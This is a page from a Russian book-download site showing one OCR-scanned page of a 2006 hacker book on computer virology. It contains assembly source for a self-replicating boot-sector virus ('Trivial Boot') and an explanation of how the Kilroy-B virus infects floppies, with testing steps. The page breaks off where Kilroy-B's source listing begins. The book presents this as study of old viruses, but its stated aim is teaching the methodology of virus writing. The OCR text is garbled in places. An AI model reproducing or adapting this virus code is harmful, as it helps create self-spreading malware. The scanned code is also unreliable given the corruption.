Книги
чёрным по белому
Главное меню
Главная О нас Добавить материал Поиск по сайту Карта книг Карта сайта
Книги
Археология Архитектура Бизнес Биология Ветеринария Военная промышленность География Геология Гороскоп Дизайн Журналы Инженерия Информационные ресурсы Искусство История Компьютерная литература Криптология Кулинария Культура Лингвистика Математика Медицина Менеджмент Металлургия Минералогия Музыка Научная литература Нумизматика Образование Охота Педагогика Политика Промышленные производства Психология Путеводители Религия Рыбалка Садоводство Саморазвитие Семиотика Социология Спорт Столярное дело Строительство Техника Туризм Фантастика Физика Футурология Химия Художественная литература Экология Экономика Электроника Энергетика Этика Юриспруденция
Новые книги
Цуканов Б.И. "Время в психике человека" (Медицина)

Суворов С. "Танк Т-64. Первенец танков 2-го поколения " (Военная промышленность)

Нестеров В.А. "Основы проэктирования ракет класса воздух- воздух и авиационных катапульных установок для них" (Военная промышленность)

Фогль Б. "101 вопрос, который задала бы ваша кошка своему ветеринару если бы умела говорить" (Ветеринария)

Яблоков Н.П. "Криминалистика" (Юриспруденция)
Реклама

Азбука хакера 3. Компьютерная вирусология - Собейкис В.Г.

Собейкис В.Г. Азбука хакера 3. Компьютерная вирусология — М.: Майор, 2006. — 512 c.
ISBN 5-98551-013-1
Скачать (прямая ссылка): hakeriazbukahakera2006.djvu
Предыдущая << 1 .. 61 62 63 64 65 66 < 67 > 68 69 70 71 72 73 .. 123 >> Следующая

сектора, чтобы начать чтение ;а1=счет трек/головка
MOV CL.DL ; сохраняем здесь сектор
XOR DX.DX
DIV WORD PTR [HEADS] делим ax на счет головок
MOV DH.DL ; головка в dh
XOR DL.DL деск в dl (0)
MOV CH.AL ;трек в ch
MOV AX,201H ;ах="читать 1-й сектор"
RET
SYSFILE_1 DB '10 SYS' системный файл MS-DOS ORG 7DFEH
BOOTJD DW 0АА55Н ;ID слово загрузочного сектора MAIN ENDS
END LOADER
Варфоломей Собейкис. АЗБУКА ХАКЕРА-3
Trivial Boot - простой вирус загрузочного сектора
Самый простой вирус загрузочного сектора будет в некотором смысле
переписывающим. Он не будет пытаться загружать операционную систему, а
просто займется своим размножением. Код для него займет лишь несколько
байтов. Мы назовем его THvial Boot. Он будет выглядеть так:
.model small .code
ORG 100H
START: call TRIV_BOOT ;загрузчик просто вызывает вирус ret ;и
выходит в DOS
ORG 7С00Н
TRIV_BOOT:
mov ax,0301H [записываем один сектор
mov bx,7C00H [отсюда
mov cx,1 [в трек 0, сектор 1, головка 0
mov dx,1 [надискВ:
int 13H .выполняем
mov ax,0301H ;еще раз выполняем, чтобы [гарантировать его работу
int 13Н
ret ;и останавливаем систему
END START
Этот загрузочный сектор копирует себя из памяти в 7С00Н к треку 0,
головке 0, сектору 1 на диске В:. Если вы стартуете компьютер с дискеты,
которая использует наш вирус как загрузочный сектор в диске А: то диск В:
получит копию вируса в свой загрузочный сектор. Ни одна операционная
система не будет загруженной. Наш Trivial Boot просто игнорирует ее.
псо
ГЛАВА 6. Инфицирование загрузочного сектора
Отметим, что Trivial Boot проводит запись дважды. За этим стоит очень
важная технология. Когда дискета в системе меняется, первая попытка
использовать int 13h часто приводит к ошибке. Таким образом, первое
чтение (int 13h, ah=2) или запись (int 13h, ah=3), произведенные вирусом,
могут оказаться неудачными, хотя диск с вирусом будет находиться в
дисководе. Поэтому первая попытка чтения или записи всегда дублируется.
Естественно, вирус Triznal Boot абсолютно неэффективен. Он работает
только на системах с двумя дисководами. А кроме того, пользователь тут же
заметит, что произошла инфекция вирусом.
КИгоу-В - улучшенный вирус загрузочного сектора
Сейчас мы рассмотрим неразрушительный вирус загрузочного сектора, который
называется Kilroy-B. Этот вирус переносится дискетами. Он (а) копирует
себя на диск В:, (б) загружает операционную систему MS-DOS и (с)
выполняет ее. Если вирус загрузочного сектора собирается сохранять
область данных в загрузочном секторе, он должен прочитать оригинальный
загрузочный сектор, а затем либо копировать себя поверх кода, либо
копировать данные в себя, чтобы позже переписать новый загрузочный сектор
обратно на диск.
Чтобы превратить DROPPER.ASM в вирус, нам нужно лишь вызвать подпрограмму
INFECT после установки важных структур данных (но перед тем, как
операционная система будет загружена).
Процесс инфицирования
Когда компьютер включается, а в его дисководе А: оставлена дискета,
зараженная Kilroy-B, вирус получает контроль раньше BIOS. Установив стек
и сегментные регистры, Kilroy-B пытается прочитать загрузочный сектор с
диска В: в буфере 0000:0500Н. Если в диск В: не вставлена дискета, вирус
получает сообщение об ошибке при выполнении функции чтения int 13h.
Получив ошибку, вирус пропускает остальную часть процесса инфицирования и
продолжает загружать операционную систему. Если чтение прошло удачно,
вирус копирует свой код в буфер в 0000:0500Н. Он специально копирует
байты из 7С00Н в 7С0АН и из 7С1ЕН в 7DFDH вниз в офсет 500Н. Вирус
пропускает область данных в загрузочном секторе, поэтому новый
загрузочный сектор в 500Н
Варфоломей Собейкис. АЗБУКА ХАКЕРА-3
имеет вирусный код, смешанный с оригинальными данными диска. Выполнив эту
задачу, он пишет свой код в загрузочный сектор диска В:, используя
прерывание 13h. На этом процесс инфицирования завершается.
Проверка Kilroy-B
Так как Kilroy-B не инфицирует жесткие диски, его довольно легко
тестировать. Вам нужно лишь выполнить KILROY.COM с системной дискеты в
дисководе А: и тем самым загрузить вирус в загрузочный сектор дискеты.
Далее, поместите дискету в дисководы А: и В:, а затем рестартируйте
компьютер. Вы можете проверить дискету в В: с помощью редактора, который
имеется в наборе нортоновских утилит. Проверка покажет в загрузочном
секторе имя "Kilroy" вместо обычного имени MS-DOS. Дискета в В: может
быть помещена в дисковод А: и запуск с нее приведет к инфицированию в
следующем поколении.
Прошу не забывать, что мы специально изучаем старые вирусы, созданные еще
в прошлом веке. Такая организация учебного процесса позволит нам понять
методологию и хитрости искусства вирусмейкерства.
Исходный код Kilroy-B
Следующую программу можно компилировать в KILROY.COM с помощью TASM, MASM
или А86.
Вирус Kilroy-B инфицирует только дискеты. Он располагается в одном
секторе. Во время загрузки DOS копирует себя из диска А: в диск В:, если
Предыдущая << 1 .. 61 62 63 64 65 66 < 67 > 68 69 70 71 72 73 .. 123 >> Следующая